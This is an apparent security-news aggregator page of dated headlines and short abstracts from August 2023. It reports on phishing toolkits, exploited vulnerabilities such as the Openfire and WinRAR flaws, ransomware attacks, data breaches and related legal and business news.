A new financially motivated operation is leveraging a malicious Telegram bot to help threat actors scam their victims. Dubbed Telekopye, a portmanteau of Telegram and kopye (meaning "spear" in Russian), the toolkit functions as an automated means to create a phishing web page from a premade template and send the URL to potential victims, codenamed Mammoths by the criminals. "This toolkit is implemented as a Telegram bot that, when activated, provides several easy-to-navigate menus in the form of clickable buttons that can accommodate many scammers at once," ESET researcher Radek Jizba said in a report shared with The Hacker News. The exact origins of the threat actors, dubbed Neanderthals, are unclear, but evidence points to Russia as the country of origin of the toolkit's authors and users, owing to the use of Russian SMS templates and the fact that a majority of the targeted online marketplaces are popular in the country. Multiple versions of Teleko... The Hacker News
August 24, 2023 – Attack
Lazarus APT exploits Zoho ManageEngine flaw to target an Internet backbone infrastructure provider Full Text
Abstract
The North Korea-linked Lazarus group exploits a critical flaw in Zoho ManageEngine ServiceDesk Plus to deliver the QuiteRAT malware. The North Korea-linked APT group Lazarus has been exploiting a critical vulnerability, tracked as CVE-2022-47966,...Security Affairs
August 24, 2023 – Hacker
Telekopye: Hunting Mammoths using Telegram bot Full Text
Abstract
The exact origins of the threat actors, dubbed Neanderthals, are unclear, but evidence points to Russia as the country of origin of the toolkit's authors and users, owing to the use of Russian SMS templates.Cyware
August 24, 2023 – General
The Hidden Dangers of Public Wi-Fi Full Text
Abstract
Public Wi-Fi, which has long since become the norm, poses threats to not only individual users but also businesses. With the rise of remote work, people can now work from virtually anywhere: a cafe close to home, a hotel in a different city, or even while waiting for a plane at the airport. Next, let's explore the risks of connecting to public Wi-Fi, both for you personally and for businesses. According to Forbes Advisor, the majority of people (56%) connect to public Wi-Fi networks that don't require a password. This convenience comes at a price, and many are unaware that attackers can steal card details, passwords, and other sensitive information. Man-in-the-Middle (MITM) Attacks: This is one of the most common threats on public Wi-Fi. In an MITM attack, the hacker secretly intercepts and possibly alters the communication between two parties. The user believes they are directly communicating with a website, email server, or another user, but the hacker is relaying tThe Hacker News
August 24, 2023 – Policy and Law
Lapsus$ member has been convicted of having hacked multiple high-profile companies Full Text
Abstract
An 18-year-old member of the Lapsus$ gang has been convicted of having helped hack multiple high-profile companies. A teenage member of the Lapsus$ data extortion group, Arion Kurtaj (18), was convicted by a London jury of having hacked multiple...Security Affairs
August 24, 2023 – Malware
Lazarus Group Exploits ManageEngine Vulnerability to Deploy QuiteRAT Full Text
Abstract
QuiteRAT is clearly an evolution of MagicRAT. While MagicRAT is a bigger, bulkier malware family averaging around 18MB in size, QuiteRAT is a much smaller implementation, averaging around 4 to 5MB in size.Cyware
August 24, 2023 – Malware
New “Whiffy Recon” Malware Triangulates Infected Device Location via Wi-Fi Every Minute Full Text
Abstract
The SmokeLoader malware is being used to deliver a new Wi-Fi scanning malware strain called Whiffy Recon on compromised Windows machines. "The new malware strain has only one operation. Every 60 seconds it triangulates the infected systems' positions by scanning nearby Wi-Fi access points as a data point for Google's geolocation API," Secureworks Counter Threat Unit (CTU) said in a statement shared with The Hacker News. "The location returned by Google's Geolocation API is then sent back to the adversary." SmokeLoader, as the name implies, is a loader malware whose sole purpose is to drop additional payloads onto a host. Since 2014, the malware has been offered for sale to Russian-based threat actors. It's traditionally distributed via phishing emails. Whiffy Recon works by checking for the WLAN AutoConfig service (WLANSVC) on the infected system and terminating itself if the service name doesn't exist. It's worth noting that thThe Hacker News
August 24, 2023 – Vulnerabilities
More than 3,000 Openfire servers exposed to attacks using a new exploit Full Text
Abstract
Researchers warn that more than 3,000 unpatched Openfire servers are exposed to attacks using an exploit for a recent flaw. Vulncheck researchers discovered more than 3,000 Openfire servers vulnerable to the CVE-2023-32315 flaw that are exposed to attacks...Security Affairs
August 24, 2023
nao-sec.org Full Text
Abstract
The APT group starts by sending a spear-phishing email, which consists of a DOC file embedded with a URL for a ZIP file download. Once the ZIP file gets downloaded, it contains an EXE file and a DLL file which are executed to infect the system with malware.Cyware
August 24, 2023 – Attack
WinRAR Security Flaw Exploited in Zero-Day Attacks to Target Traders Full Text
Abstract
A recently patched security flaw in the popular WinRAR archiving software has been exploited as a zero-day since April 2023, new findings from Group-IB reveal. The vulnerability, cataloged as CVE-2023-38831, allows threat actors to spoof file extensions, thereby making it possible to launch malicious scripts contained within an archive that masquerades as seemingly innocuous image or text files. It was addressed in version 6.23 released on August 2, 2023, alongside CVE-2023-40477. In attacks discovered by the Singapore-based firm in July 2023, specially crafted ZIP or RAR archive files distributed via trading-related forums such as Forex Station have been used to deliver a variety of malware families such as DarkMe, GuLoader, and Remcos RAT. "After infecting devices, the cybercriminals withdraw money from broker accounts," Group-IB malware analyst Andrey Polovinkin said, adding as many as 130 traders' devices have been compromised as part of the campaign. TThe Hacker News
August 24, 2023 – Vulnerabilities
Bugs in NVIDIA Graphics Driver Leads to Memory Corruption Full Text
Abstract
An attacker could exploit these vulnerabilities from guest machines running virtualization environments to perform a guest-to-host escape, as we’ve illustrated with previous vulnerabilities in NVIDIA graphics drivers.Cyware
August 24, 2023 – Vulnerabilities
Thousands of Unpatched Openfire XMPP Servers Still Exposed to High-Severity Flaw Full Text
Abstract
Thousands of Openfire XMPP servers are unpatched against a recently disclosed high-severity flaw and are susceptible to a new exploit, according to a new report from VulnCheck. Tracked as CVE-2023-32315 (CVSS score: 7.5), the vulnerability relates to a path traversal vulnerability in Openfire's administrative console that could permit an unauthenticated attacker to access otherwise restricted pages reserved for privileged users. It affects all versions of the software released since April 2015, starting with version 3.10.0. It was remediated by its developer, Ignite Realtime, earlier this May with the release of versions 4.6.8, 4.7.5, and 4.8.0. "Path traversal protections were already in place to protect against exactly this kind of attack, but didn't defend against certain non-standard URL encoding for UTF-16 characters that were not supported by the embedded web server that was in use at the time," the maintainers said in a detailed advisory. "AThe Hacker News
August 24, 2023 – Attack
More than 3,000 Openfire servers exposed to attacks using a new exploit Full Text
Abstract
The experts pointed out that the bug has been exploited for more than two months, but has yet to be added to the CISA KEV catalog. The researchers discovered approximately 6,300 servers on Shodan and a bit more using the Censys search engine.Cyware
August 24, 2023 – Policy and Law
Tornado Cash Founders Charged in Billion-Dollar Crypto Laundering Scandal Full Text
Abstract
The U.S. Justice Department (DoJ) on Wednesday unsealed an indictment against two founders of the now-sanctioned Tornado Cash cryptocurrency mixer service, charging them with laundering more than $1 billion in criminal proceeds. Both the individuals, Roman Storm and Roman Semenov, have been charged with conspiracy to commit money laundering, conspiracy to commit sanctions violations, and conspiracy to operate an unlicensed money-transmitting business. Storm, 34, is said to have been arrested in the U.S. state of Washington. Semenov, 35, remains at large in Dubai. They are alleged to have "made millions of dollars in profits" from promoting and operating the service. Tornado Cash is estimated to have processed upwards of $7 billion worth of crypto assets over a period of three years. In a related move, the U.S. Treasury Department's Office of Foreign Assets Control (OFAC) sanctioned Semenov and eight cryptocurrency addresses connected to him, days after a U.S. couThe Hacker News
August 23, 2023 – Business
Thoma Bravo Merges ForgeRock with Ping Identity Full Text
Abstract
Private equity powerhouse Thoma Bravo on Wednesday announced plans to merge the just-acquired ForgeRock with Ping Identity, combining two of the biggest names in the enterprise identity and access management market.Cyware
August 23, 2023 – Government
North Korean Affiliates Suspected in $40M Cryptocurrency Heist, FBI Warns Full Text
Abstract
The U.S. Federal Bureau of Investigation (FBI) on Tuesday warned that threat actors affiliated with North Korea may attempt to cash out stolen cryptocurrency worth more than $40 million. The law enforcement agency attributed the blockchain activity to an adversary the U.S. government tracks as TraderTraitor, which is also known by the name Jade Sleet. An investigation undertaken by the FBI found that the group moved approximately 1,580 bitcoin from several cryptocurrency heists over the past 24 hours and is currently said to be holding those funds in six different wallets. North Korea is known to blur the lines among cyber warfare, espionage, and financial crime. TraderTraitor, in particular, has been linked to a series of attacks targeting blockchain and cryptocurrency exchanges with the goal of plundering digital assets to generate illicit revenue for the sanctions-hit nation. This includes the $60 million theft of virtual currency from Alphapo on June 22, 2023; the $37 mThe Hacker News
August 23, 2023 – Policy and Law
DoJ charged Tornado Cash founders with laundering more than $1 billion Full Text
Abstract
The U.S. DoJ charged two men with operating the Tornado Cash service and laundering more than $1 Billion in criminal proceeds. The U.S. Justice Department charged two Tornado Cash founders, ROMAN STORM and ROMAN SEMENOV, with one count...Security Affairs
August 23, 2023 – Government
FBI Says North Korea’s Lazarus Hackers Behind Recent Crypto Heists Full Text
Abstract
June saw three headline-grabbing incidents involving cryptocurrency companies: a $100 million hack of Atomic Wallet on June 2, as well as two June 22 attacks in which cybercriminals stole $60 million from Alphapo and $37 million from CoinsPaid.Cyware
August 23, 2023 – Solution
Meta Set to Enable Default End-to-End Encryption on Messenger by Year End Full Text
Abstract
Meta has once again reaffirmed its plans to roll out support for end-to-end encryption (E2EE) by default for one-to-one friends and family chats on Messenger by the end of the year. As part of that effort, the social media giant said it's upgrading "millions more people's chats" effective August 22, 2023, exactly seven months after it started gradually expanding the feature to more users in January 2023. The changes are part of CEO Mark Zuckerberg's "privacy-focused vision for social networking" that was announced in 2019, although it has since encountered significant technical challenges, causing it to delay its plans by a year. "Like many messaging services, Messenger and Instagram DMs were originally designed to function via servers," Timothy Buck, product manager for Messenger, said. "Meta's servers act as the gateway between the message sender and receiver, what we call the clients." However, the addition of anThe Hacker News
August 23, 2023 – Cryptocurrency
FBI identifies wallets holding cryptocurrency funds stolen by North Korea Full Text
Abstract
The U.S. FBI warned that North Korea-linked threat actors may attempt to cash out stolen cryptocurrency worth more than $40 million. The Federal Bureau of Investigation shared details about the activity of six cryptocurrency wallets operated by North...Security Affairs
August 23, 2023 – Vulnerabilities
3,000 Openfire Servers Exposed to Attacks Targeting Recent Vulnerability Full Text
Abstract
Tracked as CVE-2023-32315, the high-severity flaw was discovered in Openfire’s administration console and is described as a path traversal bug via the setup environment that allows unauthenticated attackers to access restricted pages.Cyware
August 23, 2023 – Hacker
Agile Approach to Mass Cloud Credential Harvesting and Crypto Mining Sprints Ahead Full Text
Abstract
Developers are not the only people who have adopted the agile methodology for their development processes. From 2023-06-15 to 2023-07-11, Permiso Security's p0 Labs team identified and tracked an attacker developing and deploying eight (8) incremental iterations of their credential harvesting malware while continuing to develop infrastructure for an upcoming (spoiler: now launched) campaign targeting various cloud services. While last week Aqua Security published a blog detailing this under-development campaign's stages related to infected Docker images, today Permiso p0 Labs and SentinelLabs are releasing joint research highlighting the incremental updates to the cloud credential harvesting malware samples systematically collected by monitoring the attacker's infrastructure. So get out of your seats and enjoy this scrum meeting stand-up dedicated to sharing knowledge about this actor's campaign and the tooling they will use to steal more cloud credentials. If you like IDA screeThe Hacker News
August 23, 2023
Carderbee APT targets Hong Kong orgs via supply chain attacks Full Text
Abstract
A previously unknown APT group, tracked as Carderbee, was behind a supply chain attack against Hong Kong organizations. Symantec Threat Hunter Team reported that a previously unknown APT group, tracked as Carderbee, used a malware-laced version of the legitimate...Security Affairs
August 23, 2023 – Breach
University of Minnesota Investigates Alleged Data Breach Involving Seven Million Alumni Full Text
Abstract
The University of Minnesota has contacted law enforcement and launched an investigation into a data breach that could impact millions of alumni. A hacker claimed to have collected 7 million Social Security numbers in July.Cyware
August 23, 2023 – Hacker
Syrian Threat Actor EVLF Unmasked as Creator of CypherRAT and CraxsRAT Android Malware Full Text
Abstract
A Syrian threat actor named EVLF has been outed as the creator of malware families CypherRAT and CraxsRAT. "These RATs are designed to allow an attacker to remotely perform real-time actions and control the victim device's camera, location, and microphone," Cybersecurity firm Cyfirma said in a report published last week. CypherRAT and CraxsRAT are said to be offered to other cybercriminals as part of a malware-as-a-service (MaaS) scheme. As many as 100 unique threat actors are estimated to have purchased the twin tools on a lifetime license over the past three years. EVLF is said to be operating a web shop to advertise their warez since at least September 2022. CraxsRAT is billed as an Android trojan that enables a threat actor to remotely control an infected device from a Windows computer, with the developer consistently releasing new updates based on feedback from the customers. The malicious package is generated using a builder, which comes with options to cusThe Hacker News
August 23, 2023 – Vulnerabilities
TP-Link Tapo L530E smart bulb flaws allow hackers to steal user passwords Full Text
Abstract
Four vulnerabilities in the TP-Link Tapo L530E smart bulb and impacting the mobile app used to control them expose users to hacking. Researchers from the University of Catania (Italy) and the University of London (UK) have discovered four vulnerabilities...Security Affairs
August 23, 2023 – Government
CISA Prioritizing On-Site K-12 Cybersecurity Reviews This School Year Full Text
Abstract
The assessments can encompass a wide range of individualized reviews and actions, from preventing cyber-enabled fraud schemes to combating ransomware attacks and other digital intrusions.Cyware
August 23, 2023 – Ransomware
Spacecolon Toolset Fuels Global Surge in Scarab Ransomware Attacks Full Text
Abstract
A malicious toolset dubbed Spacecolon is being deployed as part of an ongoing campaign to spread variants of the Scarab ransomware across victim organizations globally. "It probably finds its way into victim organizations by its operators compromising vulnerable web servers or via brute forcing RDP credentials," ESET security researcher Jakub Souček said in a detailed technical write-up published Tuesday. The Slovak cybersecurity firm, which dubbed the threat actor CosmicBeetle, said the origins of Spacecolon date back to May 2020. The highest concentration of victims has been detected in France, Mexico, Poland, Slovakia, Spain, and Turkey. While the exact provenance of the adversary is unclear, several Spacecolon variants are said to contain Turkish strings, likely pointing to the involvement of a Turkish-speaking developer. There is no evidence currently linking it to any other known threat actor group. Some of the targets include a hospital and a tourist resoThe Hacker News
August 23, 2023 – Vulnerabilities
First Weekly Chrome Security Update Patches High-Severity Vulnerabilities Full Text
Abstract
Google this week announced a Chrome 116 security update that patches five memory safety vulnerabilities reported by external researchers, including four issues rated ‘high severity’.Cyware
August 23, 2023 – Malware
Over a Dozen Malicious npm Packages Target Roblox Game Developers Full Text
Abstract
More than a dozen malicious packages have been discovered on the npm package repository since the start of August 2023 with capabilities to deploy an open-source information stealer called Luna Token Grabber on systems belonging to Roblox developers. The ongoing campaign, first detected on August 1 by ReversingLabs, employs modules that masquerade as the legitimate package noblox.js, an API wrapper that's used to create scripts that interact with the Roblox gaming platform. The software supply chain security company described the activity as a "replay of an attack uncovered two years ago" in October 2021. "The malicious packages [...] reproduce code from the legitimate noblox.js package but add malicious, information-stealing functions," software threat researcher Lucija Valentić said in a Tuesday analysis. The packages were cumulatively downloaded 963 times before they were taken down. The names of the rogue packages are as follows - noblox.js-vThe Hacker News
August 23, 2023 – Ransomware
Report: Ransomware Attackers’ Dwell Time Shrinks Full Text
Abstract
Ransomware-wielding hackers are moving faster than ever to pull the trigger on malicious encryption - but they could be bumping up against the limits of how fast they can go, said security researchers from Sophos.Cyware
August 23, 2023 – Attack
Ransomware Intrusion Impacts All Servers of Danish Cloud Provider Full Text
Abstract
The attack occurred on August 18, and since then, efforts have been made to restore the data, but it has proved difficult. CloudNordic has stated that it will not pay the ransom demanded by the hackers.Cyware
August 23, 2023
Supply Chain Attack: Carderbee APT Strikes Hong Kong Organizations Full Text
Abstract
Undocumented threat cluster Carderbee was observed targeting organizations in Hong Kong and other Asian regions via a trojanized version of the legitimate software EsafeNet Cobra DocGuard Client to deliver the PlugX backdoor and gain access to victim networks. Strengthening supply chain security th ... Cyware
August 23, 2023 – Breach
Defense Contractor Belcan Leaks Admin Password With a List of Flaws Full Text
Abstract
On May 15th, the Cybernews research team discovered an open Kibana instance containing sensitive information regarding Belcan, their employees, and internal infrastructure.Cyware
August 22, 2023 – Criminals
MOVEit Attack Spree Makes Clop This Summer’s Most-Prolific Ransomware Group Full Text
Abstract
Clop was responsible for one-third of all ransomware attacks in July, positioning the financially-motivated threat actor to become the most prolific ransomware threat actor this summer, according to multiple threat intelligence reports.Cyware
August 22, 2023 – General
CISOs Tout SaaS Cybersecurity Confidence, But 79% Admit to SaaS Incidents, New Report Finds Full Text
Abstract
A new State of SaaS Security Posture Management Report from SaaS cybersecurity provider AppOmni indicates that Cybersecurity, IT, and business leaders alike recognize SaaS cybersecurity as an increasingly important part of the cyber threat landscape. And at first glance, respondents appear generally optimistic about their SaaS cybersecurity. Over 600 IT, cybersecurity, and business leaders at companies with between 500 and 2,500+ employees were surveyed and responded with confidence in their SaaS cybersecurity preparedness and capabilities. For example: When asked to rate the SaaS cybersecurity maturity level of their organizations, 71% noted that their organizations' SaaS cybersecurity maturity has achieved either a mid-high level (43%) or the highest level (28%). For the security levels of the SaaS applications authorized for use in their organization, sentiment was similarly high. Seventy-three percent rated SaaS application security as mid-high (41%) or the highest maturity level (The Hacker News
August 22, 2023 – Breach
Defense contractor Belcan leaks admin password with a list of flaws Full Text
Abstract
US Government and defense contractor Belcan left its super admin credentials open to the public, the Cybernews research team reveals. Belcan is a government, defense, and aerospace contractor offering global design, software, manufacturing, supply chain,...Security Affairs
August 22, 2023 – Malware
Thousands of Android Malware Apps Use Stealthy APKs to Bypass Security Full Text
Abstract
Threat actors are reportedly exploiting APK files that employ unknown or unsupported compression methods to bypass malware analysis, warned cybersecurity firm Zimperium. The approach hinders decompilation efforts while still enabling installation on Android devices running OS versions above Android ... Cyware
August 22, 2023 – Attack
Carderbee Attacks: Hong Kong Organizations Targeted via Malicious Software Updates Full Text
Abstract
A previously undocumented threat cluster has been linked to a software supply chain attack targeting organizations primarily located in Hong Kong and other regions in Asia. The Symantec Threat Hunter Team, part of Broadcom, is tracking the activity under its insect-themed moniker Carderbee. The attacks, per the cybersecurity firm, leverage a trojanized version of a legitimate software called EsafeNet Cobra DocGuard Client to deliver a known backdoor called PlugX (aka Korplug) on victim networks. "In the course of this attack, the attackers used malware signed with a legitimate Microsoft certificate," the company said in a report shared with The Hacker News. The use of Cobra DocGuard Client to pull off a supply chain attack was previously highlighted by ESET in its quarterly Threat Report this year, detailing a September 2022 intrusion in which an unnamed gambling company in Hong Kong was compromised via a malicious update pushed by the software. The same companyThe Hacker News
August 22, 2023 – Criminals
Akira ransomware gang spotted targeting Cisco VPN products to hack organizations Full Text
Abstract
The Akira ransomware gang targets Cisco VPN products to gain initial access to corporate networks and steal their data. The Akira ransomware has been active since March 2023; the threat actors behind the malware claim to have already hacked multiple...Security Affairs
August 22, 2023 – Hacker
EVLF DEV - Knowing the Creator of CypherRAT and CraxsRAT Full Text
Abstract
A fresh player in the realm of cyber threats has emerged under the moniker EVLF DEV, operating as a Malware-as-a-Service (MaaS) provider. Hailing from Syria and active for over eight years, this actor has developed the CypherRAT and CraxsRAT malware strains. To counteract such campaigns by maliciou ... Cyware
August 22, 2023 – Malware
New Variant of XLoader macOS Malware Disguised as ‘OfficeNote’ Productivity App Full Text
Abstract
A new variant of an Apple macOS malware called XLoader has surfaced in the wild, masquerading its malicious features under the guise of an office productivity app called "OfficeNote." "The new version of XLoader is bundled inside a standard Apple disk image with the name OfficeNote.dmg," SentinelOne security researchers Dinesh Devadoss and Phil Stokes said in a Monday analysis. "The application contained within is signed with the developer signature MAIT JAKHU (54YDV8NU9C)." XLoader, first detected in 2020, is considered a successor to Formbook and is an information stealer and keylogger offered under the malware-as-a-service (MaaS) model. A macOS variant of the malware emerged in July 2021, distributed as a Java program in the form of a compiled .JAR file. "Such files require the Java Runtime Environment, and for that reason the malicious .jar file will not execute on a macOS install out of the box, since Apple stopped shipping JRE withThe Hacker News
August 22, 2023 – Criminals
Snatch gang claims the hack of the Department of Defence South Africa Full Text
Abstract
Snatch gang claims the hack of the Department of Defence South Africa and added the military organization to its leak site. The Snatch ransomware group added the Department of Defence South Africa to its data leak site. The mission of the Department...Security Affairs
August 22, 2023 – Breach
Two Data Breaches in Gadsden: Court System, EMS Report That Data May Have Been Stolen Full Text
Abstract
The 2nd Judicial Circuit announced Monday that law enforcement is investigating a data breach involving Gadsden County court records. In a news release, the circuit said that initial assessments show some of the records contained PII.Cyware
August 22, 2023 – Vulnerabilities
Ivanti Warns of Critical Zero-Day Flaw Being Actively Exploited in Sentry Software Full Text
Abstract
Software services provider Ivanti is warning of a new critical zero-day flaw impacting Ivanti Sentry (formerly MobileIron Sentry) that it said is being actively exploited in the wild, marking an escalation of its security woes. Tracked as CVE-2023-38035 (CVSS score: 9.8), the issue has been described as a case of authentication bypass impacting versions 9.18 and prior due to what it called an insufficiently restrictive Apache HTTPD configuration. "If exploited, this vulnerability enables an unauthenticated actor to access some sensitive APIs that are used to configure the Ivanti Sentry on the administrator portal (port 8443, commonly MICS)," the company said. "While the issue has a high CVSS score, there is a low risk of exploitation for customers who do not expose port 8443 to the internet." Successful exploitation of the bug could allow an attacker to change configuration, run system commands, or write files onto the system. It's recommenThe Hacker News
August 22, 2023 – Government
CISA adds critical Adobe ColdFusion flaw to its Known Exploited Vulnerabilities catalog Full Text
Abstract
US CISA added critical vulnerability CVE-2023-26359 in Adobe ColdFusion to its Known Exploited Vulnerabilities catalog. US Cybersecurity and Infrastructure Security Agency (CISA) added a critical flaw CVE-2023-26359 (CVSS score 9.8) affecting...Security Affairs
August 22, 2023 – Breach
Snatch Gang Claims the Hack of South Africa’s Department of Defense Full Text
Abstract
The group claims to have stolen military contracts, internal call signs, and personal data, amounting to 1.6 TB. If the attack gets confirmed, the disclosure of confidential information poses a serious risk to organizations involved in the contracts.Cyware
August 22, 2023 – Vulnerabilities
Critical Adobe ColdFusion Flaw Added to CISA’s Exploited Vulnerability Catalog Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical security flaw in Adobe ColdFusion to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The vulnerability, cataloged as CVE-2023-26359 (CVSS score: 9.8), relates to a deserialization flaw present in Adobe ColdFusion 2018 (Update 15 and earlier) and ColdFusion 2021 (Update 5 and earlier) that could result in arbitrary code execution in the context of the current user without requiring any interaction. Deserialization (aka unmarshaling) refers to the process of reconstructing a data structure or an object from a byte stream. But when it's performed without validating its source or sanitizing its contents, it can lead to unexpected consequences such as code execution or denial-of-service (DoS). It was patched by Adobe as part of updates issued in March 2023. As of writing, it's not immediately clear how the flaw is being abused in the wilThe Hacker News
August 22, 2023 – Attack
A cyber attack hit the Australian software provider Energy One Full Text
Abstract
The Australian software provider Energy One announced it was hit by a cyberattack last week that affected certain corporate systems in Australia and the UK. The Australian software provider Energy One announced that a cyberattack hit certain corporate...Security Affairs
August 22, 2023
Carderbee APT Uses Legitimate Software in Supply Chain Attack Targeting Hong Kong Firms Full Text
Abstract
The group appears to be skilled and patient, selectively pushing payloads to specific victims. The use of signed malware and supply chain attacks makes it difficult for security software to detect.Cyware
August 22, 2023 – Vulnerabilities
Ivanti fixed a new critical Sentry API authentication bypass flaw Full Text
Abstract
Ivanti warned customers of a new critical Sentry API authentication bypass vulnerability tracked as CVE-2023-38035. The software company Ivanti released urgent security patches to address a critical-severity vulnerability, tracked as CVE-2023-38035...Security Affairs
August 22, 2023 – Business
Grip Security Raises $41 Million to Accelerate Growth and Extend its Market Full Text
Abstract
The investment brings Grip Security’s total funding to $66 million and marks a major milestone for the company, further accelerating its go-to-market strategy and advancing product development.Cyware
August 22, 2023 – Breach
Ukrainian Hackers Claim to Leak Emails of Russian Parliament Deputy Chief Full Text
Abstract
Ukrainian hackers claim to have broken into the email account of a senior Russian politician and exposed documents that allegedly prove his involvement in money laundering and sanction evasion schemes.Cyware
August 22, 2023 – Business
Cerby Raises $17 Million for Access Management Platform for Nonstandard Applications Full Text
Abstract
The investment round was led by Two Sigma Ventures, with additional funding from Outpost Ventures, AV8, Bowery Capital, Founders Fund, Incubate Fund, Okta Ventures, Ridge Ventures, Salesforce Ventures, and Tau Ventures.Cyware
August 21, 2023 – Phishing
Researchers Spoof an Apple Device and Trick Users Into Sharing Sensitive Data Full Text
Abstract
The spoofed Apple device prompts users to connect their Apple ID or share a password with a nearby Apple TV, allowing threat actors to collect data such as phone numbers and Apple ID emails.Cyware
August 21, 2023 – Vulnerabilities
New WinRAR Vulnerability Could Allow Hackers to Take Control of Your PC Full Text
Abstract
A high-severity security flaw has been disclosed in the WinRAR utility that could be potentially exploited by a threat actor to achieve remote code execution on Windows systems. Tracked as CVE-2023-40477 (CVSS score: 7.8), the vulnerability has been described as a case of improper validation while processing recovery volumes. "The issue results from the lack of proper validation of user-supplied data, which can result in a memory access past the end of an allocated buffer," the Zero Day Initiative (ZDI) said in an advisory. "An attacker can leverage this vulnerability to execute code in the context of the current process." Successful exploitation of the flaw requires user interaction in that the target must be lured into visiting a malicious page or by simply opening a booby-trapped archive file. A security researcher, who goes by the alias goodbyeselene, has been credited with discovering and reporting the flaw on June 8, 2023. The issue has been addressThe Hacker News
August 21, 2023 – Breach
BlackCat ransomware group claims the hack of Seiko network Full Text
Abstract
The BlackCat/ALPHV ransomware group claims to have hacked the Japanese maker of watches Seiko and added the company to its data leak site. On August 10, 2023, the Japanese maker of watches Seiko disclosed a data breach following a cyber attack. "Seiko...Security Affairs
August 21, 2023 – Malware
HiatusRAT Returns after a Hiatus in a Fresh Wave of Attacks Full Text
Abstract
The HiatusRAT malware group reemerged to target Taiwan-based organizations and a U.S. military procurement system allegedly to snoop on military contracts. The audacity of threat actors is evident in their disregard for previous disclosures and their minimal efforts to change their payload servers...Cyware
August 21, 2023 – Solution
How to Investigate an OAuth Grant for Suspicious Activity or Overly Permissive Scopes Full Text
Abstract
From a user's perspective, OAuth works like magic. In just a few keystrokes, you can whisk through the account creation process and gain immediate access to whatever new app or integration you're seeking. Unfortunately, few users understand the implications of the permissions they allow when they create a new OAuth grant, making it easy for malicious actors to manipulate employees into giving away unintended access to corporate environments. In one of the highest-profile examples, Pawn Storm's attacks against the Democratic National Convention and others leveraged OAuth to target victims through social engineering. Security and IT teams would be wise to establish a practice of reviewing new and existing OAuth grants programmatically to catch risky activity or overly-permissive scopes. And, there are new solutions for SaaS security cropping up that can make this process easier. Let's take a look at some best practices for prioritizing and investigating your organization's grantsThe Hacker News
August 21, 2023 – Attack
New HiatusRAT campaign targets Taiwan and U.S. military procurement system Full Text
Abstract
HiatusRAT malware operators resurfaced with a new wave of attacks targeting Taiwan-based organizations and a U.S. military procurement system. In March 2023, Lumen Black Lotus Labs researchers uncovered a sophisticated campaign called “HiatusRAT”...Security Affairs
August 21, 2023 – Criminals
Researchers Uncover Real Identity of CypherRAT and CraxsRAT Malware Developer Full Text
Abstract
The CraxsRAT builder, Cyfirma says, generates highly obfuscated packages, allowing threat actors to customize the contents based on the type of attack they are preparing, including with WebView page injections.Cyware
August 21, 2023 – Malware
This Malware Turned Thousands of Hacked Windows and macOS PCs into Proxy Servers Full Text
Abstract
Threat actors are leveraging access to malware-infected Windows and macOS machines to deliver a proxy server application and use them as exit nodes to reroute proxy requests. According to AT&T Alien Labs, the unnamed company that offers the proxy service operates more than 400,000 proxy exit nodes, although it's not immediately clear how many of them were co-opted by malware installed on infected machines without user knowledge and interaction. "Although the proxy website claims that its exit nodes come only from users who have been informed and agreed to the use of their device," the cybersecurity company said it found evidence where "malware writers are installing the proxy silently in infected systems." Multiple malware families have been observed delivering the proxy to users searching for cracked software and games. The proxy software, written in the Go programming language, is capable of targeting both Windows and macOS, with the former capable oThe Hacker News
August 21, 2023 – Vulnerabilities
Spoofing an Apple device and tricking users into sharing sensitive data Full Text
Abstract
White hat hackers at the recent hacking conference Def Con demonstrated how to spoof an Apple device and trick users into sharing their sensitive data. At the recent Def Con hacking conference, white hat hackers demonstrated how to spoof an Apple...Security Affairs
August 21, 2023 – Breach
Tesla Discloses Data Breach Impacting 75,000 People’s Personal Information Full Text
Abstract
A notification letter sent to impacted people reveals that the data breach is related to a couple of former employees sending confidential information to German media outlet Handelsblatt.Cyware
August 21, 2023 – Malware
HiatusRAT Malware Resurfaces: Taiwan Firms and U.S. Military Under Attack Full Text
Abstract
The threat actors behind the HiatusRAT malware have returned from their hiatus with a new wave of reconnaissance and targeting activity aimed at Taiwan-based organizations and a U.S. military procurement system. Besides recompiling malware samples for different architectures, the artifacts are said to have been hosted on new virtual private servers (VPSs), Lumen Black Lotus Labs said in a report published last week. The cybersecurity firm described the activity cluster as "brazen" and "one of the most audacious," indicating no signs of slowing down. The identity and the origin of the threat actors are presently unknown. Targets included commercial firms, such as semiconductor and chemical manufacturers, and at least one municipal government organization in Taiwan as well as a U.S. Department of Defense (DoD) server associated with submitting and retrieving proposals for defense contracts. HiatusRAT was first disclosed by the cybersecurity company in MarchThe Hacker News
August 21, 2023 – Government
Israel and US to Invest $3.85 Million in projects for critical infrastructure protection through the BIRD Cyber Program Full Text
Abstract
Israel and US government agencies announced the BIRD Cyber Program, an investment of roughly $4M in projects to enhance the cyber resilience of critical infrastructure. The BIRD Cyber Program is a joint initiative from the Israel National Cyber Directorate...Security Affairs
August 21, 2023 – Policy and Law
Federally Insured Credit Unions Required to Report Cyber Incidents Within 72 Hours Full Text
Abstract
The new policy, National Credit Union Administration (NCUA) announced, comes into effect on September 1, and will cover all incidents that impact information systems or the integrity, confidentiality, or availability of data on those systems.Cyware
August 21, 2023 – Criminals
Australia’s .AU Domain Administrator Denies Data Breach After Ransomware Posting Full Text
Abstract
The organization that manages Australia’s internet domain .au denied that it was affected by a data breach on Friday after a ransomware gang added it to their list of victims.Cyware
August 20, 2023
N. Korean Kimsuky APT targets S. Korea-US military exercises Full Text
Abstract
North Korea-linked APT Kimsuky launched a spear-phishing campaign targeting US contractors working at the war simulation centre. North Korea-linked APT group Kimsuky carried out a spear-phishing campaign against US contractors involved in a joint...Security Affairs
August 20, 2023 – Vulnerabilities
Four Juniper Junos OS flaws can be chained to remotely hack devices Full Text
Abstract
Juniper Networks addressed multiple flaws in the J-Web component of Junos OS that could be chained to achieve remote code execution. Juniper Networks has released an "out-of-cycle" security update to address four vulnerabilities in the J-Web component...Security Affairs
August 20, 2023 – General
Security Affairs newsletter Round 433 by Pierluigi Paganini – International edition Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free for you in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. Over...Security Affairs
August 20, 2023 – Solution
Cybersecurity: CASB vs SASE Full Text
Abstract
Understanding cybersecurity aspects addressed by Cloud Access Security Broker (CASB) and Secure Access Service Edge (SASE) In an increasingly digital world, where businesses rely on cloud services and remote access, cybersecurity has become paramount....Security Affairs
